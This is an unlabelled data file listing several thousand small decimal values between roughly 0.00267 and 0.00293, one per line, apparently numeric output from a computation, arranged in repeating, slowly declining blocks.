0.00293172
0.00293186
0.00292709
0.00293171
0.00292725
0.0029271
0.00292116
0.00291651
0.00292125
0.00291652
0.00291667
0.00292116
0.00292128
0.00292722
0.00293184
0.00293173
0.00292698
0.00293172
0.00292706
0.00292706
0.00292115
0.0029213
0.0029167
0.00291655
0.00291669
0.00292116
0.0029213
0.00292724
0.00293172
0.00293186
0.00292709
0.00293171
0.00292725
0.0029271
0.00292116
0.00291651
0.00292125
0.00291652
0.00292128
0.00292116
0.00291667
0.00292722
0.00293184
0.00293172
0.00292698
0.00293172
0.00292706
0.00292706
0.00292115
0.0029213
0.0029167
0.00291655
0.00292116
0.0029213
0.00291669
0.00292715
0.00292749
0.00293166
0.00293166
0.00293177
0.00292724
0.00292724
0.00290016
0.00289989
0.00289568
0.00289568
0.00289559
0.00290005
0.00290005
0.00288512
0.00288546
0.00288957
0.00288957
0.00288967
0.00288521
0.00288521
0.00290011
0.00290026
0.00289554
0.00289569
0.00290026
0.00290011
0.00289568
0.00290615
0.00291063
0.00291074
0.00290591
0.002906
0.00291062
0.00290599
0.00290617
0.00290603
0.00291077
0.00291062
0.00290603
0.00291062
0.00290618
0.00290011
0.0028955
0.0029002
0.00289549
0.00290023
0.00290012
0.00289566
0.00290011
0.00290026
0.00289554
0.00289569
0.00290026
0.00290011
0.00289568
0.00290615
0.00291063
0.00291074
0.00290591
0.00291062
0.002906
0.00290599
0.00290617
0.00290603
0.00291077
0.00291062
0.00291062
0.00290603
0.00290618
0.00290012
0.0028955
0.0029002
0.00289549
0.00290023
0.00289566
0.00290012
0.00288521
0.00288978
0.00288963
0.00288507
0.00288962
0.00288507
0.00288522
0.00287917
0.00287457
0.00287926
0.00287458
0.00287918
0.00287928
0.00287474
0.00288518
0.00288975
0.00288964
0.00288494
0.00288502
0.00288963
0.00288503
0.00287916
0.00287932
0.00287462
0.00287477
0.00287932
0.00287917
0.00287476
0.00288521
0.00288978
0.00288963
0.00288507
0.00288962
0.00288507
0.00288522
0.00287917
0.00287457
0.00287925
0.00287458
0.00287928
0.00287918
0.00287474
0.00288518
0.00288975
0.00288964
0.00288494
0.00288963
0.00288503
0.00288502
0.00287916
0.00287932
0.00287462
0.00287477
0.00287932
0.00287917
0.00287476
0.00290016
0.0028999
0.00289568
0.00289568
0.00290005
0.00290006
0.00289559
0.00288512
0.00288546
0.00288957
0.00288957
0.00288521
0.00288967
0.00288521
0.00290011
0.00290026
0.00289554
0.00289569
0.00290026
0.00290011
0.00289568
0.00290615
0.00291063
0.00291074
0.00290591
0.002906
0.00291062
0.00290599
0.00290617
0.00290603
0.00291077
0.00291062
0.00290603
0.00291062
0.00290618
0.00290011
0.0028955
0.0029002
0.00289549
0.00290023
0.00290012
0.00289565
0.00290011
0.00290026
0.00289569
0.00289554
0.00290011
0.00290026
0.00289568
0.00290615
0.00291063
0.00291074
0.00290591
0.00291062
0.002906
0.00290599
0.00290617
0.00290603
0.00291062
0.00291077
0.00291062
0.00290618
0.00290603
0.00290011
0.0028955
0.0029002
0.00289549
0.00290023
0.00289566
0.00290012
0.0028852
0.00288978
0.00288963
0.00288507
0.00288962
0.00288507
0.00288521
0.00287917
0.00287457
0.00287925
0.00287458
0.00287918
0.00287928
0.00287474
0.00288518
0.00288975
0.00288964
0.00288493
0.00288502
0.00288963
0.00288503
0.00287916
0.00287932
0.00287462
0.00287477
0.00287932
0.00287917
0.00287476
0.0028852
0.00288963
0.00288978
0.00288507
0.00288962
0.00288521
0.00288507
0.00287917
0.00287457
0.00287925
0.00287458
0.00287929
0.00287918
0.00287474
0.00288518
0.00288975
0.00288964
0.00288494
0.00288963
0.00288503
0.00288502
0.00287916
0.00287932
0.00287477
0.00287462
0.00287917
0.00287932
0.00287476
0.00290011
0.00290026
0.00289569
0.00289554
0.00290011
0.00290026
0.00289568
0.00290615
0.00291063
0.00291074
0.00290591
0.00290599
0.00291062
0.002906
0.00290617
0.00290603
0.00291062
0.00291077
0.00290618
0.00291062
0.00290603
0.00290011
0.0028955
0.0029002
0.00289549
0.00290012
0.00290023
0.00289565
0.00288521
0.00288978
0.00288963
0.00288507
0.00288962
0.00288507
0.00288522
0.00287917
0.00287457
0.00287925
0.00287458
0.00287474
0.00287918
0.00287929
0.00288518
0.00288975
0.00288964
0.00288494
0.00288963
0.00288502
0.00288503
0.00287916
0.00287932
0.00287462
0.00287477
0.00287476
0.00287932
0.00287917
0.0028852
0.00288963
0.00288978
0.00288507
0.00288962
0.00288522
0.00288507
0.00287917
0.00287457
0.00287925
0.00287458
0.00287928
0.00287918
0.00287474
0.00288518
0.00288975
0.00288964
0.00288493
0.00288963
0.00288503
0.00288502
0.00287916
0.00287932
0.00287477
0.00287462
0.00287917
0.00287932
0.00287476
0.00290016
0.00289989
0.00289568
0.00289568
0.00290005
0.00290006
0.00289559
0.00288512
0.00288546
0.00288957
0.00288957
0.00288521
0.00288967
0.0028852
0.00290011
0.00290026
0.00289569
0.00289554
0.00290011
0.00290026
0.00289568
0.00290615
0.00291063
0.00291074
0.00290591
0.00290599
0.00291062
0.00290599
0.00290617
0.00290603
0.00291062
0.00291077
0.00290618
0.00291062
0.00290603
0.00290011
0.0028955
0.0029002
0.00289549
0.00290012
0.00290023
0.00289565
0.0028852
0.00288963
0.00288978
0.00288507
0.00288962
0.00288521
0.00288507
0.00287917
0.00287457
0.00287925
0.00287458
0.00287474
0.00287918
0.00287928
0.00288518
0.00288975
0.00288964
0.00288493
0.00288963
0.00288502
0.00288503
0.00287916
0.00287932
0.00287477
0.00287462
0.00287476
0.00287917
0.00287932
0.0028852
0.00288963
0.00288978
0.00288507
0.00288962
0.00288521
0.00288507
0.00287917
0.00287457
0.00287925
0.00287458
0.00287929
0.00287918
0.00287473
0.00288518
0.00288975
0.00288964
0.00288493
0.00288963
0.00288503
0.00288502
0.00287916
0.00287932
0.00287477
0.00287462
0.00287917
0.00287932
0.00287476
0.00288511
0.00288546
0.00288957
0.00288957
0.00288967
0.00288521
0.0028852
0.00285835
0.0028581
0.00285394
0.00285394
0.00285385
0.00285826
0.00285826
0.00284347
0.00284382
0.00284787
0.00284787
0.00284796
0.00284357
0.00284356
0.00285832
0.00285848
0.0028538
0.00285395
0.00285847
0.00285832
0.00285393
0.00286431
0.00286874
0.00286885
0.00286406
0.00286416
0.00286873
0.00286415
0.00286433
0.0028642
0.00286888
0.00286873
0.0028642
0.00286873
0.00286435
0.00285832
0.00285375
0.0028584
0.00285375
0.00285843
0.00285833
0.00285391
0.00285832
0.00285848
0.0028538
0.00285395
0.00285847
0.00285832
0.00285393
0.00286431
0.00286874
0.00286885
0.00286406
0.00286873
0.00286416
0.00286415
0.00286433
0.0028642
0.00286888
0.00286873
0.00286873
0.0028642
0.00286434
0.00285832
0.00285375
0.0028584
0.00285375
0.00285843
0.00285391
0.00285833
0.00284356
0.00284808
0.00284794
0.00284343
0.00284793
0.00284343
0.00284357
0.00283757
0.00283302
0.00283765
0.00283303
0.00283758
0.00283768
0.00283318
0.00284354
0.00284805
0.00284794
0.00284328
0.00284337
0.00284793
0.00284338
0.00283756
0.00283773
0.00283307
0.00283322
0.00283771
0.00283757
0.00283321
0.00284356
0.00284808
0.00284794
0.00284343
0.00284793
0.00284343
0.00284357
0.00283757
0.00283302
0.00283765
0.00283302
0.00283768
0.00283758
0.00283318
0.00284354
0.00284804
0.00284794
0.00284328
0.00284793
0.00284338
0.00284337
0.00283756
0.00283772
0.00283307
0.00283322
0.00283771
0.00283757
0.00283321
0.00285835
0.0028581
0.00285394
0.00285394
0.00285826
0.00285826
0.00285384
0.00284347
0.00284382
0.00284787
0.00284787
0.00284357
0.00284796
0.00284356
0.00285832
0.00285848
0.0028538
0.00285395
0.00285847
0.00285832
0.00285393
0.00286431
0.00286874
0.00286885
0.00286406
0.00286416
0.00286873
0.00286415
0.00286433
0.0028642
0.00286888
0.00286874
0.0028642
0.00286873
0.00286435
0.00285832
0.00285376
0.0028584
0.00285375
0.00285843
0.00285833
0.00285391
0.00285832
0.00285848
0.00285395
0.0028538
0.00285832
0.00285847
0.00285393
0.00286431
0.00286874
0.00286885
0.00286406
0.00286873
0.00286416
0.00286415
0.00286433
0.0028642
0.00286873
0.00286888
0.00286873
0.00286434
0.0028642
0.00285832
0.00285375
0.0028584
0.00285375
0.00285843
0.00285391
0.00285833
0.00284356
0.00284808
0.00284794
0.00284343
0.00284793
0.00284343
0.00284357
0.00283757
0.00283302
0.00283765
0.00283302
0.00283758
0.00283768
0.00283318
0.00284354
0.00284805
0.00284794
0.00284328
0.00284337
0.00284793
0.00284338
0.00283756
0.00283773
0.00283307
0.00283322
0.00283771
0.00283757
0.00283321
0.00284356
0.00284794
0.00284808
0.00284343
0.00284793
0.00284357
0.00284343
0.00283757
0.00283302
0.00283765
0.00283303
0.00283768
0.00283758
0.00283318
0.00284354
0.00284805
0.00284794
0.00284328
0.00284793
0.00284338
0.00284337
0.00283756
0.00283773
0.00283322
0.00283307
0.00283757
0.00283771
0.0028332
0.00285832
0.00285848
0.00285395
0.0028538
0.00285832
0.00285847
0.00285393
0.00286431
0.00286874
0.00286885
0.00286406
0.00286415
0.00286873
0.00286415
0.00286433
0.0028642
0.00286873
0.00286888
0.00286435
0.00286873
0.0028642
0.00285832
0.00285375
0.0028584
0.00285375
0.00285833
0.00285843
0.00285391
0.00284356
0.00284808
0.00284794
0.00284343
0.00284793
0.00284343
0.00284357
0.00283757
0.00283302
0.00283765
0.00283303
0.00283318
0.00283758
0.00283768
0.00284354
0.00284805
0.00284794
0.00284328
0.00284793
0.00284337
0.00284338
0.00283756
0.00283772
0.00283307
0.00283322
0.00283321
0.00283771
0.00283757
0.00284356
0.00284794
0.00284808
0.00284343
0.00284793
0.00284357
0.00284343
0.00283757
0.00283302
0.00283765
0.00283302
0.00283768
0.00283758
0.00283318
0.00284354
0.00284804
0.00284794
0.00284328
0.00284793
0.00284338
0.00284337
0.00283756
0.00283772
0.00283322
0.00283307
0.00283757
0.00283771
0.0028332
0.00285835
0.0028581
0.00285394
0.00285394
0.00285826
0.00285826
0.00285384
0.00284347
0.00284382
0.00284787
0.00284787
0.00284357
0.00284796
0.00284356
0.00285832
0.00285848
0.00285395
0.0028538
0.00285832
0.00285847
0.00285393
0.00286431
0.00286874
0.00286885
0.00286406
0.00286415
0.00286873
0.00286415
0.00286433
0.0028642
0.00286873
0.00286888
0.00286434
0.00286873
0.0028642
0.00285832
0.00285375
0.0028584
0.00285375
0.00285833
0.00285843
0.00285391
0.00284356
0.00284794
0.00284808
0.00284343
0.00284793
0.00284357
0.00284343
0.00283757
0.00283302
0.00283765
0.00283302
0.00283318
0.00283758
0.00283768
0.00284354
0.00284804
0.00284794
0.00284328
0.00284793
0.00284337
0.00284338
0.00283756
0.00283772
0.00283322
0.00283307
0.0028332
0.00283757
0.00283771
0.00284356
0.00284794
0.00284808
0.00284343
0.00284793
0.00284357
0.00284343
0.00283757
0.00283301
0.00283765
0.00283303
0.00283768
0.00283758
0.00283318
0.00284353
0.00284804
0.00284794
0.00284328
0.00284793
0.00284338
0.00284337
0.00283756
0.00283772
0.00283322
0.00283307
0.00283757
0.00283771
0.0028332
0.00284347
0.00284382
0.00284787
0.00284787
0.00284796
0.00284356
0.00284356
0.00281693
0.00281669
0.00281258
0.00281257
0.00281247
0.00281684
0.00281684
0.00280218
0.00280254
0.00280654
0.00280654
0.00280663
0.00280229
0.00280229
0.0028169
0.00281706
0.00281244
0.00281258
0.00281705
0.00281691
0.00281257
0.00282285
0.00282724
0.00282734
0.00282259
0.00282269
0.00282723
0.00282268
0.00282287
0.00282276
0.00282737
0.00282723
0.00282275
0.00282722
0.00282289
0.00281691
0.00281238
0.00281698
0.00281237
0.00281702
0.00281692
0.00281254
0.0028169
0.00281706
0.00281244
0.00281258
0.00281705
0.00281691
0.00281257
0.00282285
0.00282724
0.00282734
0.00282259
0.00282723
0.00282269
0.00282268
0.00282287
0.00282276
0.00282737
0.00282723
0.00282722
0.00282274
0.00282289
0.00281691
0.00281239
0.00281698
0.00281237
0.00281702
0.00281254
0.00281692
0.00280228
0.00280675
0.00280661
0.00280216
0.0028066
0.00280215
0.00280229
0.00279634
0.00279183
0.00279641
0.00279183
0.00279635
0.00279644
0.00279199
0.00280225
0.00280672
0.00280662
0.00280199
0.00280209
0.00280661
0.0028021
0.00279633
0.00279649
0.00279189
0.00279203
0.00279648
0.00279634
0.00279201
0.00280228
0.00280675
0.00280661
0.00280216
0.0028066
0.00280215
0.00280229
0.00279633
0.00279182
0.00279641
0.00279183
0.00279644
0.00279634
0.00279199
0.00280225
0.00280672
0.00280662
0.00280199
0.00280661
0.0028021
0.00280209
0.00279633
0.00279649
0.00279189
0.00279203
0.00279648
0.00279634
0.00279201
0.00281693
0.00281669
0.00281258
0.00281257
0.00281684
0.00281684
0.00281247
0.00280218
0.00280254
0.00280654
0.00280654
0.00280229
0.00280663
0.00280229
0.0028169
0.00281706
0.00281244
0.00281258
0.00281705
0.00281691
0.00281257
0.00282285
0.00282724
0.00282734
0.00282259
0.00282269
0.00282723
0.00282268
0.00282287
0.00282275
0.00282737
0.00282723
0.00282274
0.00282722
0.00282289
0.00281691
0.00281239
0.00281698
0.00281237
0.00281702
0.00281692
0.00281254
0.0028169
0.00281706
0.00281258
0.00281244
0.00281691
0.00281705
0.00281257
0.00282285
0.00282724
0.00282734
0.00282259
0.00282723
0.00282269
0.00282268
0.00282287
0.00282275
0.00282723
0.00282737
0.00282722
0.00282289
0.00282274
0.00281691
0.00281238
0.00281698
0.00281237
0.00281701
0.00281254
0.00281692
0.00280228
0.00280675
0.00280661
0.00280216
0.0028066
0.00280215
0.00280229
0.00279634
0.00279183
0.00279641
0.00279184
0.00279635
0.00279644
0.00279199
0.00280225
0.00280672
0.00280662
0.00280199
0.00280209
0.00280661
0.0028021
0.00279633
0.00279649
0.00279189
0.00279203
0.00279648
0.00279634
0.00279201
0.00280228
0.00280661
0.00280675
0.00280216
0.0028066
0.00280229
0.00280215
0.00279633
0.00279183
0.00279641
0.00279183
0.00279644
0.00279635
0.00279199
0.00280225
0.00280672
0.00280662
0.00280199
0.00280661
0.0028021
0.00280209
0.00279633
0.00279649
0.00279203
0.00279189
0.00279634
0.00279648
0.00279201
0.0028169
0.00281706
0.00281258
0.00281244
0.00281691
0.00281705
0.00281257
0.00282285
0.00282724
0.00282734
0.00282259
0.00282268
0.00282723
0.00282269
0.00282287
0.00282275
0.00282723
0.00282737
0.00282289
0.00282722
0.00282274
0.00281691
0.00281238
0.00281698
0.00281237
0.00281692
0.00281701
0.00281254
0.00280228
0.00280675
0.00280661
0.00280216
0.0028066
0.00280215
0.00280229
0.00279633
0.00279182
0.00279641
0.00279184
0.00279198
0.00279634
0.00279644
0.00280225
0.00280672
0.00280662
0.00280199
0.00280661
0.00280209
0.0028021
0.00279633
0.00279649
0.00279189
0.00279203
0.00279201
0.00279648
0.00279634
0.00280228
0.00280661
0.00280675
0.00280216
0.0028066
0.00280229
0.00280215
0.00279633
0.00279182
0.00279641
0.00279183
0.00279644
0.00279634
0.00279199
0.00280225
0.00280672
0.00280662
0.00280199
0.00280661
0.0028021
0.00280208
0.00279633
0.00279649
0.00279203
0.00279189
0.00279634
0.00279648
0.00279201
0.00281693
0.00281669
0.00281258
0.00281257
0.00281684
0.00281684
0.00281247
0.00280218
0.00280254
0.00280654
0.00280654
0.00280229
0.00280663
0.00280229
0.0028169
0.00281706
0.00281258
0.00281244
0.00281691
0.00281705
0.00281256
0.00282285
0.00282724
0.00282734
0.00282259
0.00282268
0.00282723
0.00282269
0.00282287
0.00282275
0.00282723
0.00282737
0.00282289
0.00282722
0.00282274
0.00281691
0.00281239
0.00281698
0.00281237
0.00281692
0.00281702
0.00281254
0.00280228
0.00280661
0.00280675
0.00280216
0.0028066
0.00280229
0.00280215
0.00279634
0.00279183
0.00279641
0.00279183
0.00279199
0.00279635
0.00279644
0.00280225
0.00280672
0.00280662
0.00280199
0.00280661
0.00280209
0.0028021
0.00279633
0.00279649
0.00279203
0.00279189
0.00279201
0.00279634
0.00279648
0.00280228
0.00280661
0.00280675
0.00280216
0.0028066
0.00280229
0.00280215
0.00279633
0.00279182
0.00279641
0.00279183
0.00279644
0.00279634
0.00279198
0.00280225
0.00280672
0.00280662
0.00280199
0.00280661
0.0028021
0.00280208
0.00279633
0.00279649
0.00279203
0.00279189
0.00279634
0.00279648
0.00279201
0.00280218
0.00280254
0.00280654
0.00280654
0.00280663
0.00280229
0.00280228
0.00277586
0.00277562
0.00277156
0.00277156
0.00277145
0.00277577
0.00277577
0.00276124
0.00276161
0.00276555
0.00276555
0.00276564
0.00276135
0.00276135
0.00277584
0.002776
0.00277142
0.00277156
0.00277599
0.00277585
0.00277155
0.00278174
0.00278609
0.00278619
0.00278148
0.00278159
0.00278608
0.00278158
0.00278177
0.00278166
0.00278622
0.00278608
0.00278164
0.00278607
0.00278178
0.00277585
0.00277137
0.00277592
0.00277136
0.00277595
0.00277586
0.00277152
0.00277584
0.002776
0.00277142
0.00277156
0.00277599
0.00277585
0.00277154
0.00278174
0.00278609
0.00278619
0.00278148
0.00278608
0.00278159
0.00278158
0.00278177
0.00278166
0.00278622
0.00278608
0.00278607
0.00278164
0.00278178
0.00277585
0.00277137
0.00277592
0.00277136
0.00277595
0.00277151
0.00277586
0.00276134
0.00276577
0.00276563
0.00276124
0.00276562
0.00276122
0.00276136
0.00275544
0.00275098
0.00275552
0.00275098
0.00275546
0.00275555
0.00275113
0.00276131
0.00276574
0.00276565
0.00276105
0.00276116
0.00276563
0.00276117
0.00275543
0.0027556
0.00275103
0.00275117
0.00275558
0.00275544
0.00275116
0.00276134
0.00276577
0.00276563
0.00276123
0.00276563
0.00276122
0.00276136
0.00275544
0.00275097
0.00275551
0.00275098
0.00275554
0.00275546
0.00275113
0.00276131
0.00276574
0.00276565
0.00276105
0.00276563
0.00276117
0.00276116
0.00275543
0.0027556
0.00275103
0.00275117
0.00275558
0.00275544
0.00275116
0.00277586
0.00277562
0.00277156
0.00277155
0.00277577
0.00277577
0.00277145
0.00276124
0.00276161
0.00276555
0.00276555
0.00276135
0.00276564
0.00276135
0.00277584
0.002776
0.00277142
0.00277156
0.00277599
0.00277585
0.00277155
0.00278174
0.00278609
0.00278619
0.00278148
0.00278159
0.00278608
0.00278158
0.00278177
0.00278166
0.00278622
0.00278608
0.00278164
0.00278607
0.00278178
0.00277585
0.00277137
0.00277592
0.00277136
0.00277595
0.00277586
0.00277152
0.00277584
0.002776
0.00277156
0.00277142
0.00277585
0.00277599
0.00277154
0.00278174
0.00278609
0.00278619
0.00278148
0.00278608
0.00278159
0.00278158
0.00278177
0.00278166
0.00278608
0.00278622
0.00278607
0.00278178
0.00278164
0.00277585
0.00277137
0.00277592
0.00277136
0.00277595
0.00277152
0.00277586
0.00276134
0.00276577
0.00276563
0.00276123
0.00276562
0.00276122
0.00276136
0.00275544
0.00275098
0.00275552
0.00275098
0.00275546
0.00275554
0.00275113
0.00276131
0.00276574
0.00276565
0.00276105
0.00276116
0.00276563
0.00276117
0.00275543
0.0027556
0.00275103
0.00275117
0.00275558
0.00275544
0.00275116
0.00276134
0.00276563
0.00276577
0.00276123
0.00276562
0.00276136
0.00276122
0.00275544
0.00275098
0.00275551
0.00275098
0.00275554
0.00275546
0.00275113
0.00276131
0.00276574
0.00276565
0.00276105
0.00276563
0.00276117
0.00276116
0.00275543
0.0027556
0.00275117
0.00275103
0.00275544
0.00275558
0.00275116
0.00277584
0.002776
0.00277156
0.00277142
0.00277585
0.00277599
0.00277154
0.00278174
0.00278609
0.00278619
0.00278147
0.00278158
0.00278608
0.00278159
0.00278177
0.00278166
0.00278608
0.00278622
0.00278178
0.00278607
0.00278164
0.00277585
0.00277137
0.00277592
0.00277136
0.00277586
0.00277595
0.00277151
0.00276134
0.00276577
0.00276563
0.00276123
0.00276562
0.00276122
0.00276136
0.00275544
0.00275097
0.00275551
0.00275098
0.00275113
0.00275546
0.00275554
0.00276131
0.00276574
0.00276565
0.00276105
0.00276563
0.00276116
0.00276117
0.00275543
0.0027556
0.00275103
0.00275117
0.00275116
0.00275558
0.00275544
0.00276134
0.00276563
0.00276577
0.00276123
0.00276562
0.00276136
0.00276122
0.00275544
0.00275097
0.00275551
0.00275098
0.00275554
0.00275546
0.00275113
0.00276131
0.00276574
0.00276565
0.00276105
0.00276563
0.00276117
0.00276116
0.00275543
0.0027556
0.00275117
0.00275103
0.00275544
0.00275558
0.00275116
0.00277586
0.00277562
0.00277156
0.00277155
0.00277577
0.00277577
0.00277145
0.00276124
0.00276161
0.00276555
0.00276555
0.00276135
0.00276564
0.00276135
0.00277584
0.002776
0.00277156
0.00277142
0.00277585
0.00277599
0.00277154
0.00278174
0.00278609
0.00278619
0.00278148
0.00278158
0.00278608
0.00278159
0.00278177
0.00278166
0.00278608
0.00278622
0.00278178
0.00278607
0.00278164
0.00277585
0.00277137
0.00277592
0.00277136
0.00277586
0.00277595
0.00277151
0.00276134
0.00276563
0.00276577
0.00276123
0.00276562
0.00276136
0.00276122
0.00275544
0.00275098
0.00275551
0.00275098
0.00275113
0.00275546
0.00275554
0.00276131
0.00276574
0.00276565
0.00276105
0.00276563
0.00276116
0.00276117
0.00275543
0.0027556
0.00275117
0.00275103
0.00275116
0.00275544
0.00275558
0.00276134
0.00276563
0.00276577
0.00276123
0.00276562
0.00276136
0.00276122
0.00275544
0.00275097
0.00275551
0.00275098
0.00275554
0.00275546
0.00275113
0.00276131
0.00276574
0.00276565
0.00276105
0.00276563
0.00276117
0.00276116
0.00275543
0.0027556
0.00275117
0.00275103
0.00275544
0.00275558
0.00275116
0.00276124
0.00276161
0.00276555
0.00276555
0.00276564
0.00276135
0.00276135
0.00273512
0.00273489
0.00273086
0.00273086
0.00273074
0.00273503
0.00273503
0.00272062
0.00272099
0.00272489
0.00272489
0.00272498
0.00272073
0.00272073
0.0027351
0.00273527
0.00273072
0.00273086
0.00273525
0.00273511
0.00273085
0.00274097
0.00274528
0.00274537
0.0027407
0.00274082
0.00274527
0.00274082
0.00274099
0.00274089
0.00274541
0.00274527
0.00274087
0.00274526
0.00274101
0.00273511
0.00273067
0.00273518
0.00273067
0.00273521
0.00273513
0.00273082
0.0027351
0.00273527
0.00273072
0.00273086
0.00273525
0.00273511
0.00273085
0.00274097
0.00274528
0.00274537
0.0027407
0.00274527
0.00274082
0.00274081
0.00274099
0.00274089
0.0027454
0.00274527
0.00274526
0.00274087
0.00274101
0.00273511
0.00273067
0.00273519
0.00273067
0.00273521
0.00273082
0.00273513
0.00272072
0.00272511
0.00272498
0.00272062
0.00272497
0.0027206
0.00272074
0.00271486
0.00271043
0.00271493
0.00271043
0.00271488
0.00271496
0.00271059
0.0027207
0.00272507
0.00272499
0.00272042
0.00272054
0.00272498
0.00272054
0.00271485
0.00271501
0.00271049
0.00271063
0.00271499
0.00271486
0.00271061
0.00272072
0.00272511
0.00272498
0.00272062
0.00272497
0.0027206
0.00272074
0.00271486
0.00271043
0.00271493
0.00271043
0.00271496
0.00271488
0.00271059
0.0027207
0.00272507
0.00272499
0.00272042
0.00272498
0.00272054
0.00272054
0.00271485
0.00271501
0.00271049
0.00271063
0.00271499
0.00271486
0.00271061
0.00273512
0.00273489
0.00273086
0.00273086
0.00273503
0.00273503
0.00273074
0.00272061
0.00272099
0.00272489
0.00272489
0.00272073
0.00272498
0.00272073
0.0027351
0.00273527
0.00273073
0.00273087
0.00273525
0.00273511
0.00273085
0.00274097
0.00274528
0.00274537
0.0027407
0.00274082
0.00274527
0.00274082
0.00274099
0.00274089
0.0027454
0.00274527
0.00274087
0.00274526
0.00274101
0.00273511
0.00273067
0.00273519
0.00273067
0.00273521
0.00273513
0.00273082
0.0027351
0.00273527
0.00273087
0.00273073
0.00273511
0.00273525
0.00273085
0.00274097
0.00274528
0.00274537
0.0027407
0.00274527
0.00274082
0.00274082
0.00274099
0.00274089
0.00274527
0.0027454
0.00274526
0.00274101
0.00274087
0.00273511
0.00273067
0.00273518
0.00273067
0.00273521
0.00273082
0.00273513
0.00272072
0.00272511
0.00272498
0.00272062
0.00272497
0.0027206
0.00272074
0.00271486
0.00271044
0.00271493
0.00271043
0.00271488
0.00271496
0.00271059
0.0027207
0.00272508
0.00272499
0.00272042
0.00272055
0.00272498
0.00272054
0.00271485
0.00271501
0.00271049
0.00271063
0.00271499
0.00271486
0.00271061
0.00272072
0.00272498
0.00272511
0.00272062
0.00272497
0.00272074
0.0027206
0.00271486
0.00271044
0.00271493
0.00271043
0.00271496
0.00271488
0.00271059
0.0027207
0.00272508
0.00272499
0.00272042
0.00272498
0.00272054
0.00272055
0.00271485
0.00271501
0.00271063
0.00271049
0.00271486
0.002715
0.00271061
0.0027351
0.00273527
0.00273087
0.00273072
0.00273511
0.00273525
0.00273085
0.00274097
0.00274528
0.00274537
0.0027407
0.00274081
0.00274527
0.00274081
0.00274099
0.00274089
0.00274527
0.0027454
0.00274101
0.00274526
0.00274087
0.00273511
0.00273067
0.00273518
0.00273067
0.00273513
0.00273521
0.00273082
0.00272072
0.00272511
0.00272498
0.00272062
0.00272497
0.0027206
0.00272074
0.00271486
0.00271043
0.00271493
0.00271043
0.00271059
0.00271488
0.00271496
0.0027207
0.00272508
0.00272499
0.00272042
0.00272498
0.00272054
0.00272054
0.00271485
0.00271501
0.00271049
0.00271063
0.00271061
0.00271499
0.00271486
0.00272072
0.00272498
0.00272511
0.00272062
0.00272497
0.00272074
0.0027206
0.00271486
0.00271043
0.00271493
0.00271043
0.00271496
0.00271488
0.00271059
0.0027207
0.00272508
0.00272499
0.00272042
0.00272498
0.00272054
0.00272054
0.00271485
0.00271501
0.00271063
0.00271049
0.00271486
0.00271499
0.00271061
0.00273512
0.00273489
0.00273086
0.00273086
0.00273503
0.00273503
0.00273074
0.00272062
0.00272099
0.00272489
0.00272489
0.00272074
0.00272498
0.00272073
0.0027351
0.00273527
0.00273086
0.00273073
0.00273511
0.00273525
0.00273085
0.00274097
0.00274528
0.00274537
0.0027407
0.00274081
0.00274527
0.00274081
0.00274099
0.00274089
0.00274527
0.0027454
0.00274101
0.00274526
0.00274087
0.00273512
0.00273067
0.00273518
0.00273067
0.00273513
0.00273521
0.00273082
0.00272072
0.00272498
0.00272511
0.00272062
0.00272497
0.00272074
0.0027206
0.00271487
0.00271044
0.00271493
0.00271043
0.00271059
0.00271488
0.00271496
0.0027207
0.00272508
0.00272499
0.00272042
0.00272498
0.00272055
0.00272054
0.00271485
0.00271501
0.00271063
0.00271049
0.00271061
0.00271486
0.002715
0.00272072
0.00272498
0.00272511
0.00272062
0.00272497
0.00272074
0.0027206
0.00271487
0.00271043
0.00271493
0.00271043
0.00271496
0.00271488
0.00271059
0.0027207
0.00272508
0.00272499
0.00272042
0.00272498
0.00272054
0.00272054
0.00271485
0.00271501
0.00271063
0.00271049
0.00271486
0.00271499
0.00271061
0.00272062
0.00272099
0.00272489
0.00272489
0.00272498
0.00272073
0.00272073
0.00269468
0.00269445
0.00269046
0.00269046
0.00269034
0.00269459
0.00269459
0.00268029
0.00268067
0.00268453
0.00268453
0.00268462
0.00268041
0.00268041
0.00269467
0.00269483
0.00269033
0.00269047
0.00269481
0.00269468
0.00269044
0.0027005
0.00270478
0.00270486
0.00270022
0.00270034
0.00270477
0.00270034
0.00270052
0.00270042
0.00270489
0.00270476
0.0027004
0.00270475
0.00270054
0.00269469
0.00269026
0.00269475
0.00269027
0.00269478
0.0026947
0.00269043
0.00269467
0.00269483
0.00269033
0.00269047
0.00269481
0.00269468
0.00269044
0.0027005
0.00270478
0.00270486
0.00270022
0.00270477
0.00270033
0.00270035
0.00270052
0.00270042
0.00270489
0.00270476
0.00270475
0.0027004
0.00270054
0.00269469
0.00269026
0.00269475
0.00269028
0.00269478
0.00269043
0.0026947
0.00268039
0.00268475
0.00268462
0.00268029
0.00268461
0.00268027
0.00268042
0.00267458
0.00267018
0.00267464
0.00267016
0.00267459
0.00267466
0.00267035
0.00268038
0.00268471
0.00268463
0.00268008
0.00268022
0.00268462
0.0026802
0.00267456
0.00267472
0.00267023
0.00267038
0.0026747
0.00267457
0.00267036
0.00268039
0.00268475
0.00268462
0.00268029
0.00268461
0.00268027
0.00268042
0.00267458
0.00267018
0.00267464
0.00267016
0.00267466
0.00267459
0.00267035
0.00268038
0.00268471
0.00268464
0.00268009
0.00268463
0.0026802
0.00268022
0.00267456
0.00267472
0.00267023
0.00267038
0.0026747
0.00267457
0.00267036
0.00269468
0.00269445
0.00269046
0.00269046
0.00269459
0.00269459
0.00269035
0.00268029
0.00268067
0.00268453
0.00268453
0.00268041
0.00268462
0.00268041
0.00269467
0.00269483
0.00269033
0.00269047
0.00269481
0.00269468
0.00269045
0.0027005
0.00270478
0.00270486
0.00270022
0.00270034
0.00270477
0.00270035
0.00270052
0.00270042
0.0027049
0.00270476
0.00270041
0.00270475
0.00270054
0.00269469
0.00269026
0.00269475
0.00269028
0.00269478
0.0026947
0.00269044
0.00269467
0.00269483
0.00269047
0.00269033
0.00269468
0.00269481
0.00269045
0.0027005
0.00270478
0.00270486
0.00270022
0.00270477
0.00270034
0.00270035
0.00270052
0.00270042
0.00270476
0.0027049
0.00270475
0.00270054
0.00270041
0.00269469
0.00269026
0.00269475
0.00269028
0.00269478
0.00269044
0.0026947
0.00268039
0.00268475
0.00268462
0.00268029
0.00268461
0.00268027
0.00268042
0.00267458
0.00267018
0.00267464
0.00267016
0.00267459
0.00267467
0.00267035
0.00268038
0.00268471
0.00268464
0.00268009
0.00268022
0.00268463
0.0026802
0.00267456
0.00267472
0.00267023
0.00267038
0.0026747
0.00267458
0.00267036
0.00268039
0.00268462
0.00268475
0.00268029
0.00268461
0.00268042
0.00268027
0.00267458
0.00267018
0.00267464
0.00267016
